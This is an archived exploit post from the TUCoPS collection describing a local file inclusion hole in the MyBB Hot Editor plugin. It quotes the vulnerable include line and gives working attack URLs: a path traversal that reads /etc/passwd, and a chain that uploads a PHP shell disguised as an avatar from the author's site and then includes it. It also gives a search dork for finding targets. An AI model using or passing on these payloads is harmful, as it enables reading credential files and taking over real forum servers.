TUCoPS :: Web BBS :: Frequently Exploited :: tb10325.htm

Mybb Hot Editor Plugin Local File Inclusion
Mybb Hot Editor Plugin Local File Inclusion
Mybb Hot Editor Plugin Local File Inclusion


www.expw0rm.com 
Mail : liz0@expw0rm.com 
---------------------------------------
Vul. Code : keyboard.php line 3 


	require_once "./vk_code/$first";
----------------------------------------


*/

http://victim.com/[path]/richedit/keyboard.php?first=../../../../../../../../../../../../../../../../../etc/passwd 

And

upload php shell = > http://www.expw0rm.com/avatar_36.zip 

http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/avatars/avatar_36.gif => target isn't show with ie.plese you use firefox 

Dork: "MTR Paket :"
?>

// Exploit Worm www.expw0rm.com 

orginal: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114.html

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH